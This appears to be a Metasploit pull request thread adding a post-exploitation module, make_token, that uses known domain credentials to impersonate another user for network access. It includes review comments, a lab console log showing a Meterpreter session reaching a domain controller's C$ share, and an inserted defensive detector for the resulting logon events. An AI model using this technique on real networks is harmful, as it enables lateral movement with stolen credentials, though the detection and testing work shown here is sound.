Add update_token to MSF + make_token post-ex module #18022

Merged
8 commits merged Jun 8, 2023

Conversation

attl4s (Contributor) commented May 24, 2023

This PR adds the Ruby code needed to leverage the new update_token function explained at rapid7/metasploit-payloads#648, for Meterpreter's stdapi extension. It also adds a new post-ex module using the new functionality:

  • post/windows/manage/make_token

This module mimics Cobalt Strike's make_token command. In its default configuration, this module creates a new network security context with the specified logon data (username, domain and password). Under the hood, Meterpreter's access token is cloned, and a new logon session is created and linked to that token. The token is then impersonated to acquire the new network security context. This module has no effect on local actions - only on remote ones (where the specified credential material is used) and it does not validate the credentials specified. For advanced users, the default logon type (LOGON32_LOGON_NEW_CREDENTIALS) can be changed to any other valid value.

An example can be seen below.

Example

The Meterpreter session is running as CAP\vegeta (low-priv domain user). With plaintext credentials, we can use the new module to act on behalf of CAP\bulma_da (domain admin) in the network. As can be seen, the directory listing call to \\dc01\C$ works after using the module.

Review comment on modules/post/windows/manage/make_token.rb (outdated):

```ruby
# send warning
if logontype == 'LOGON32_LOGON_NEW_CREDENTIALS'
  print_warning("Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)")
```
Reviewer (Contributor):

Do you have any context you can provide as to why this is only the case for this particular logon type?

attl4s (Contributor, author) replied:

I believe the LOGON32_LOGON_NEW_CREDENTIALS logon type is the only one that duplicates the original access token of the user, thus has no result on local actions. It only updates the logon session ID to a new logon session with the specified credentials for network access.
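The two comments above turn on what LOGON32_LOGON_NEW_CREDENTIALS changes and what it leaves alone, so here is how that behaviour looks from the defender's side. This is an added example, not code from this PR or from Metasploit: a small detector over Windows Security 4624 records. A LogonUser call with LOGON32_LOGON_NEW_CREDENTIALS is recorded on the calling host as a 4624 with logon type 9 (NewCredentials) and logon process Advapi; because the token is a clone of the caller's, that record names the caller's own account, not the supplied one, exactly as getuid keeps showing the original user. The supplied credentials only surface as a network (type 3) logon on the remote host, so the useful signal is the pairing of the two. The sample records are constructed; the JSON-lines layout, the epoch-seconds TimeCreated field, the host-to-IP map passed to detect() and the allowlist parameter are assumptions about how the logs were exported, not part of the module.

```python
"""Detector for LOGON32_LOGON_NEW_CREDENTIALS token creation (4624 / logon type 9).

Added example for this PR thread; not part of metasploit-framework.
Assumptions: Security events are exported as one JSON object per line using
the 4624 field names (EventID, LogonType, SubjectUserName, TargetUserName,
LogonProcessName, ProcessName, IpAddress, Computer) plus TimeCreated as epoch
seconds, and the caller supplies a map from host name to its IP address.
"""
import json
from dataclasses import dataclass

NEW_CREDENTIALS = 9   # LOGON32_LOGON_NEW_CREDENTIALS: cloned token, new logon session
NETWORK = 3           # network logon on the remote host, where the new credentials are used
WINDOW_SECONDS = 300  # how long after the type 9 logon a remote logon is attributed to it

# Directories from which a legitimate runas-style tool is unlikely to run.
USER_WRITABLE_MARKERS = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")

# Constructed sample (not real log output): three workstation events and two
# domain-controller events. The type 9 record on WS01 still names aliddle,
# while the DC sees smcintyre arriving from WS01's address shortly afterwards.
SAMPLE_JSONL = r"""
{"EventID": 4624, "LogonType": 2, "Computer": "WS01", "TimeCreated": 1000, "SubjectUserName": "-", "TargetUserName": "aliddle", "TargetDomainName": "MSFLAB", "LogonProcessName": "User32", "ProcessName": "C:\\Windows\\System32\\winlogon.exe", "IpAddress": "-"}
{"EventID": 4624, "LogonType": 9, "Computer": "WS01", "TimeCreated": 1100, "SubjectUserName": "aliddle", "TargetUserName": "aliddle", "TargetDomainName": "MSFLAB", "LogonProcessName": "Advapi", "ProcessName": "C:\\Users\\aliddle\\AppData\\Local\\Temp\\update.exe", "IpAddress": "-"}
{"EventID": 4624, "LogonType": 9, "Computer": "WS01", "TimeCreated": 1150, "SubjectUserName": "SYSTEM", "TargetUserName": "SYSTEM", "TargetDomainName": "NT AUTHORITY", "LogonProcessName": "Advapi", "ProcessName": "C:\\Windows\\System32\\svchost.exe", "IpAddress": "-"}
{"EventID": 4624, "LogonType": 3, "Computer": "DC01", "TimeCreated": 1130, "SubjectUserName": "-", "TargetUserName": "smcintyre", "TargetDomainName": "MSFLAB", "LogonProcessName": "Kerberos", "ProcessName": "-", "IpAddress": "192.168.159.70"}
{"EventID": 4624, "LogonType": 3, "Computer": "DC01", "TimeCreated": 900, "SubjectUserName": "-", "TargetUserName": "aliddle", "TargetDomainName": "MSFLAB", "LogonProcessName": "Kerberos", "ProcessName": "-", "IpAddress": "192.168.159.70"}
"""


@dataclass(frozen=True)
class TokenAlert:
    computer: str
    subject: str            # account that owned the cloned token (unchanged by the call)
    process: str            # image that called LogonUser
    time: int
    severity: str
    remote_accounts: tuple  # other accounts that then authenticated from this host


def parse_events(jsonl: str) -> list:
    """Parse a JSON-lines export into a list of event dicts, skipping blank lines."""
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def from_user_writable_path(path: str) -> bool:
    """True when the calling image lives in a user-writable location."""
    low = path.lower()
    return any(marker in low for marker in USER_WRITABLE_MARKERS)


def new_credentials_logons(events):
    """All successful logons that created a NewCredentials (type 9) session."""
    return [e for e in events
            if e.get("EventID") == 4624 and e.get("LogonType") == NEW_CREDENTIALS]


def remote_logons_from(events, src_ip, not_on, since, until, except_user):
    """Accounts seen in network logons from src_ip on other hosts inside the
    window, excluding the token owner's own account (which would be normal)."""
    return tuple(sorted({
        r["TargetUserName"] for r in events
        if r.get("EventID") == 4624 and r.get("LogonType") == NETWORK
        and r.get("IpAddress") == src_ip and r.get("Computer") != not_on
        and since <= r.get("TimeCreated", -1) <= until
        and r["TargetUserName"].lower() != except_user.lower()
    }))


def detect(events, host_ips, allowed_processes=frozenset()):
    """One TokenAlert per type 9 logon. Severity is 'high' when a different
    account then authenticated from the same host (the make_token pattern),
    'medium' when the caller runs from a user-writable path, 'low' otherwise.
    allowed_processes holds lower-cased image paths that are baselined out."""
    alerts = []
    for ev in new_credentials_logons(events):
        proc = ev.get("ProcessName", "-")
        if proc.lower() in allowed_processes:
            continue
        remote = remote_logons_from(
            events, host_ips.get(ev["Computer"]), ev["Computer"],
            ev["TimeCreated"], ev["TimeCreated"] + WINDOW_SECONDS, ev["SubjectUserName"])
        if remote:
            severity = "high"
        elif from_user_writable_path(proc):
            severity = "medium"
        else:
            severity = "low"
        alerts.append(TokenAlert(ev["Computer"], ev["SubjectUserName"], proc,
                                 ev["TimeCreated"], severity, remote))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_JSONL), {"WS01": "192.168.159.70"}):
        print(alert)
```

Run on the sample, the aliddle logon is rated high because smcintyre is seen authenticating to DC01 from WS01's address within the window, while the SYSTEM logon from svchost.exe stays low; without the host-to-IP map no correlation is possible and the Temp-path caller falls back to medium. Type 9 logons are common enough from legitimate tooling that the allowlist and the correlation, not the bare event, carry the rule.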

@smcintyre-r7 smcintyre-r7 self-assigned this May 24, 2023
@smcintyre-r7 smcintyre-r7 added module needs-docs rn-modules release notes for new or majorly enhanced modules labels May 24, 2023
github-actions bot commented:

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

Review comment on modules/post/windows/manage/make_token.rb (outdated):

```ruby
def run
  # Make sure we meet the requirements before running the script
  fail_with(Failure::NoTarget, 'This module requires a meterpreter session') unless session.type == 'meterpreter'
```
Reviewer (Contributor):

BadConfig might be a better fit for this error because the session is user configurable.

attl4s (Contributor, author) replied:

39b4569 + 217df62 😋

attl4s and others added 2 commits May 25, 2023 18:55
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
smcintyre-r7 (Contributor) commented Jun 5, 2023

@attl4s The payloads side of this has been landed and the gem has been bumped so we're no longer blocked on that. The last two things we need for this to get landed are for the module docs to be written and for the module to be linted.

@smcintyre-r7 smcintyre-r7 added the needs-linting The module needs additional work to pass our automated linting rules label Jun 5, 2023
github-actions bot commented Jun 5, 2023

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

```
rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>
```

You can automate most of these changes with the -a flag:

```
rubocop -a <directory or file>
```

Please update your branch after these have been made, and reach out if you have any problems.

attl4s (Contributor, author) commented Jun 6, 2023

> @attl4s The payloads side of this has been landed and the gem has been bumped so we're no longer blocked on that. The last two things we need for this to get landed are for the module docs to be written and for the module to be linted.

Awesome! -> a34c3cf and ec948b5

smcintyre-r7 added a commit that referenced this pull request Jun 8, 2023
Add update_token to MSF + make_token post-ex module
@smcintyre-r7 smcintyre-r7 merged commit ec948b5 into rapid7:master Jun 8, 2023
30 checks passed
smcintyre-r7 (Contributor) commented:

Everything looks good to me and I've gone ahead and landed this module.

```text
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.70:61682) at 2023-06-01 17:02:10 -0400
sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > sysinfo
Computer        : WINDOWS-11-VM
OS              : Windows 10 (10.0 Build 22621).
Architecture    : x64
System Language : en_US
Domain          : MSFLAB
Logged On Users : 9
Meterpreter     : x64/windows
meterpreter > ls \\\\dc\\C$
[-] stdapi_fs_stat: Operation failed: Access is denied.
meterpreter > run post/windows/manage/make_token username=smcintyre password=Password2! domain=msflab.local

[*] Executing rev2self to revert any previous token impersonations
[*] Executing LogonUserA with the flag LOGON32_LOGON_NEW_CREDENTIALS to create a new security context for msflab.local\smcintyre
[*] Impersonating the new security context...
[+] The session should now run with the new security context!
[!] Remember that this will not have any effect on local actions (i.e. getuid will still show the original user)
meterpreter > getuid
Server username: MSFLAB\aliddle
meterpreter > ls \\\\dc\\C$
Listing: \\dc\C$
================

Mode              Size        Type  Last modified              Name
----              ----        ----  -------------              ----
040777/rwxrwxrwx  0           dir   2023-02-10 09:59:20 -0500  $Recycle.Bin
040777/rwxrwxrwx  0           dir   2022-08-05 15:16:50 -0400  Documents and Settings
040777/rwxrwxrwx  0           dir   2023-05-25 13:52:45 -0400  PerfLogs
040555/r-xr-xr-x  0           dir   2023-05-31 17:00:51 -0400  Program Files
040777/rwxrwxrwx  0           dir   2023-05-31 17:00:51 -0400  Program Files (x86)
040777/rwxrwxrwx  0           dir   2022-08-05 15:26:01 -0400  ProgramData
040777/rwxrwxrwx  0           dir   2022-08-05 15:16:50 -0400  Recovery
040777/rwxrwxrwx  0           dir   2023-02-10 12:53:39 -0500  System Volume Information
040555/r-xr-xr-x  0           dir   2023-02-10 09:59:14 -0500  Users
040777/rwxrwxrwx  0           dir   2023-05-30 08:36:40 -0400  Windows
100666/rw-rw-rw-  1342177280  fil   2023-06-01 08:37:35 -0400  pagefile.sys

meterpreter >
```

I made a few minor changes in d8870d7 to bring the module docs in line with the standard format and address the warnings from msftidy_docs.rb.

Thanks for this contribution!

smcintyre-r7 (Contributor) commented Jun 8, 2023

Release Notes

This adds the post/windows/manage/make_token module which is capable of creating new tokens from known credentials and then setting them in a running instance of Meterpreter, which can allow that session to access resources it might not have previously been able to access.

@smcintyre-r7 smcintyre-r7 removed needs-docs needs-linting The module needs additional work to pass our automated linting rules labels Jun 8, 2023
@attl4s attl4s deleted the make_token branch June 9, 2023 06:57